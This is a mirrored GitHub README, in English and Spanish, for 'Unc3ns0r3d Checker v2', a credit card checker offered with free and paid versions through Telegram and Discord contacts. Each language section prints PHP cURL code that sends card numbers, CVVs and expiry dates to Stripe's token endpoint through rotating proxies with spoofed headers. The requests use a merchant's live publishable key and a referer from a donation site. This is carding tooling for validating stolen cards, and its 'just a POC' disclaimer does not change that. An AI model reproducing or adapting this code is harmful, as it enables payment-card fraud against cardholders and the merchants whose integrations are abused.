Git Product home page Git Product logo

unc3ns0r3d-checkerv2's Introduction

ATTENTION YOU ARE RESPONSIBLE IF YOU MISUSE THIS, I DO NOT TAKE ANY RESPONSIBILITY FOR YOU ACTION THROUGH THIS. THIS IS JUST A POC.

PLEASE DO NOT TEND TO MOD/HACK PHP SCRIPTS WITHIN THIS REPO. AND DO SOMETHING THAT WOULD GET YOURSELF INTO TROUBLE. SINCE I DON'T CARE IF YOU DO SO, YOU'D BE BEHIND BARD FOR MISUSING THIS POC.

Unc3ns0r3d Checker v2

⛔Unc3ns0r3d-Checker⛔

Language: EN (ENGLISH)

✔ Credit card 💳 checker, based on real donation systems and other type of donations.

// cURL Stripe Method by ⛔UJnc3ns0r3d⛔

$url1 = 'https://api.stripe.com/v1/tokens';
$url2 = 'https://www.anime-shop-online.com/cart';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$url1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_PROXY, "http://$re_proxy:$port");
curl_setopt($ch, CURLOPT_PROXYUSERPWD, "$username-session-$session:$password");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
    curl_setopt($ch, CURLOPT_HTTPHEADER, array(
   'Host: api.stripe.com',
'User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0',
'Accept: application/json',
'Content-Type: application/x-www-form-urlencoded',
'Referer: https://js.stripe.com/v2/channel.html?stripe_xdm_e=https%3A%2F%2Fwww.thelambcenter.org&stripe_xdm_c=default816925&stripe_xdm_p=1',
'Connection: keep-alive'
    ));
curl_setopt($ch, CURLOPT_POSTFIELDS, 'card[name]='.$name.'+'.$last.'&card[number]='.$cc.'&card[cvc]='.$cvv.'&card[exp_month]='.$mes.'&card[exp_year]='.$ano.'&guid=061ff506-3903-498a-8f51-6c186f16f8ca&muid=7aea1b41-a3a5-4a59-adcd-c1b9697c50d2&sid=9f8fcbca-42eb-4131-9f86-d326ea6a5af2&payment_user_agent=stripe.js%2Fc272b3d3%3B+stripe-js-v3%2Fc272b3d3&referrer=https%3A%2F%2Fwww.anime-shop-online.com%2Fcart&key=pk_live_mw2Cnk8hIQMzEbJMcA2gjYNy&pasted_fields=number%2Ccvc');
$pagamento = curl_exec($ch);
$token = trim(strip_tags(getstr($pagamento,'id": "','"')));

SITES 🌐

Files included 📂

  • api.php Free
  • api_1.php Free
  • api_p1.php Pay > @MrPopos2 - Telegram - SkarY#0554 - Discord
  • api_p2.php Pay > @MrPopos2 - Telegram - SkarY#0554 - Discord

About Me 👨‍💻

Founder of Unc3ns0r3d💳 - HasBins💳 - CloudChckr💳 (Closed)

My favorite programming languages are C ++, VB.NET, PYTHON, PHP, JAVASCIPRT and JQUERY❤

I love coffee❤

The Unc3ns0r3d project was created 04/26/2018

Contact Me ✉

  • @MrPopos2 - Telegram
  • SkarY#0554 - Discord

================================================================

Idioma: ES (Español)

Checker de tarjetas de crédito, basado en sistemas de donación reales y stripe

// cURL Stripe Method by ⛔UJnc3ns0r3d⛔

$url1 = 'https://api.stripe.com/v1/tokens';
$url2 = 'https://www.anime-shop-online.com/cart';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$url1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_PROXY, "http://$re_proxy:$port");
curl_setopt($ch, CURLOPT_PROXYUSERPWD, "$username-session-$session:$password");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
    curl_setopt($ch, CURLOPT_HTTPHEADER, array(
   'Host: api.stripe.com',
'User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0',
'Accept: application/json',
'Content-Type: application/x-www-form-urlencoded',
'Referer: https://js.stripe.com/v2/channel.html?stripe_xdm_e=https%3A%2F%2Fwww.thelambcenter.org&stripe_xdm_c=default816925&stripe_xdm_p=1',
'Connection: keep-alive'
    ));
curl_setopt($ch, CURLOPT_POSTFIELDS, 'card[name]='.$name.'+'.$last.'&card[number]='.$cc.'&card[cvc]='.$cvv.'&card[exp_month]='.$mes.'&card[exp_year]='.$ano.'&guid=061ff506-3903-498a-8f51-6c186f16f8ca&muid=7aea1b41-a3a5-4a59-adcd-c1b9697c50d2&sid=9f8fcbca-42eb-4131-9f86-d326ea6a5af2&payment_user_agent=stripe.js%2Fc272b3d3%3B+stripe-js-v3%2Fc272b3d3&referrer=https%3A%2F%2Fwww.anime-shop-online.com%2Fcart&key=pk_live_mw2Cnk8hIQMzEbJMcA2gjYNy&pasted_fields=number%2Ccvc');
$pagamento = curl_exec($ch);
$token = trim(strip_tags(getstr($pagamento,'id": "','"')));

SITIOS 🌐

Archivos Incluidos 📂

  • api.php Gratuito
  • api_1.php Gratuito
  • api_p1.php Pago > @MrPopos2 - Telegram - SkarY#0554 - Discord
  • api_p2.php Pago > @MrPopos2 - Telegram - SkarY#0554 - Discord

Sobre Mi 👨‍💻

Fundador de Unc3ns0r3d💳 - HasBins💳 - CloudChckr💳 (Cerrado)

Mis lenguajes favorios de programación son C ++, VB.NET, PYTHON, PHP, JAVASCIPRT y JQUERY❤

Amo el café❤

Proyecto Unc3ns0r3d fue creado el día 04/26/2018 / Editado 24/08/2019

Contactame ✉

  • @MrPopos2 - Telegram
  • SkarY#0554 - Discord

unc3ns0r3d-checkerv2's People

Contributors

c4p-n1ck avatar skaryxd avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.